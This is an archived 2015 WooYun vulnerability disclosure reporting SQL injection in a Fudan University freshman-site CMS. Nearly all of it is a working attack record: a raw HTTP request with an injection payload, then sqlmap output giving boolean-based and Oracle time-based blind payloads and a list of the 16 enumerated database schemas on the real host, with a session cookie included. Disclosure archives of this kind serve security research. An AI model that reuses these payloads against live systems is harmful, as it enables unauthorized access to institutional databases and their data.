乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开
GET /cms/view/lm!bksWebShow.action?ck=-1' OR 1=1* or 'qzaCwUmS'=' &id=1010&lmType=42&secondId=402880c447814cc2014781c74cf6002f&showt=lb HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.freshman.fudan.edu.cnCookie: JSESSIONID=016D210EF4E434EFB4294E0743C019CBHost: www.freshman.fudan.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.freshman.fudan.edu.cn:80/cms/view/lm!bksWebShow.action?ck=-1' OR 1=1 AND 8864=8864 or 'qzaCwUmS'=' &id=1010&lmType=42&secondId=402880c447814cc2014781c74cf6002f&showt=lb Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: http://www.freshman.fudan.edu.cn:80/cms/view/lm!bksWebShow.action?ck=-1' OR 1=1 AND 2770=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(79)||CHR(72)||CHR(109),5) or 'qzaCwUmS'=' &id=1010&lmType=42&secondId=402880c447814cc2014781c74cf6002f&showt=lb---web application technology: JSPback-end DBMS: Oracleavailable databases [16]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[*] YX_FUDAN_NEW
危害等级:无影响厂商忽略
忽略时间:2015-11-22 06:20
漏洞Rank:4 (WooYun评价)
暂无